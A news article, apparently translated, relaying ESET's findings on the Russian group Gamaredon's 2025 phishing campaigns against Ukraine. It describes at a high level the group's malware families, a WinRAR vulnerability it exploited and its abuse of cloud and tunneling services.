In 2025, the Russian hacking group Gamaredon conducted 35 separate targeted phishing campaigns against Ukraine, with the majority of attacks occurring in the second half of the year. The main targets of the attackers were Ukrainian state and military institutions.
In 2025, the Russian hacking group Gamaredon conducted 35 separate targeted phishing campaigns against Ukraine, with the majority of attacks occurring in the second half of the year. The main targets of the attackers were Ukrainian state and military institutions.
This was reported by the Slovak cybersecurity company ESET, The Hacker News reports .
“Throughout 2025, Gamaredon hackers were highly active and focused exclusively on Ukraine,” ESET noted. “The ultimate goal of the group remains the theft of confidential information and other critical data that can be used to support Russia’s interests in the protracted war against Ukraine.”
To carry out targeted phishing, hackers use embedded archives or XHTML files. Using stealth download technology, they deliver malicious HTA downloaders to the device, which then install other viruses, including PteroSand. In addition, in some attacks, attackers have exploited a recently closed vulnerability in WinRAR (CVE-2025-8088) to drop a malicious file directly into the victim’s Windows startup folder.
Because of this, the virus automatically starts during each subsequent login, allowing hackers to gain a secure foothold on the computer. To further advance within the compromised network, Gamaredon uses the PteroLNK and PteroPaste utilities. They infect flash drives and network drives with malicious LNK files. When an unsuspecting user opens such a shortcut, the main malware automatically starts downloading.
Hackers are also using PteroSetup. This is an older VBScript-based utility that was first spotted in January 2021 and has since been considered deprecated. The program searches flash drives and network drives for regular installation files (program installation files) and replaces them with self-extracting 7z (SFX) archives. Inside such an archive, the original installer is hidden along with a malicious VBScript loader.
“During 2025, the group began to use third-party tools much more actively. Tunneling services and serverless computing platforms became key elements with which the attackers hid their real backend infrastructure,” ESET experts noted.
“Although the group took a short operational pause in January 2025, Gamaredon devoted most of the first half of the year to developing and deploying new tools,” noted ESET researcher Zoltan Rusnak.
"Many updates appeared on the eve of major holidays in Russia and Crimea. It is noteworthy that no updates were recorded during the holidays themselves or immediately after them. This further supports the fact that Gamaredon operators are likely full-time civil servants."
Another notable aspect of this cyber group's campaign is the use of a wide range of legitimate services as conduits for data extraction and as "dead spots" to obtain information about the C2 server and redirect malware to infrastructure already hidden behind tunnels or serverless computing.
“As in previous years, the group compensated for the relative simplicity of its malware with persistence, frequent updates, and increasingly creative abuse of legitimate online services,” ESET noted. “Gamaredon further expanded its use of digital “cache,” tunnels, serverless computing, dynamic DNS, and cloud storage, making its operations more flexible and countering them much more difficult.”
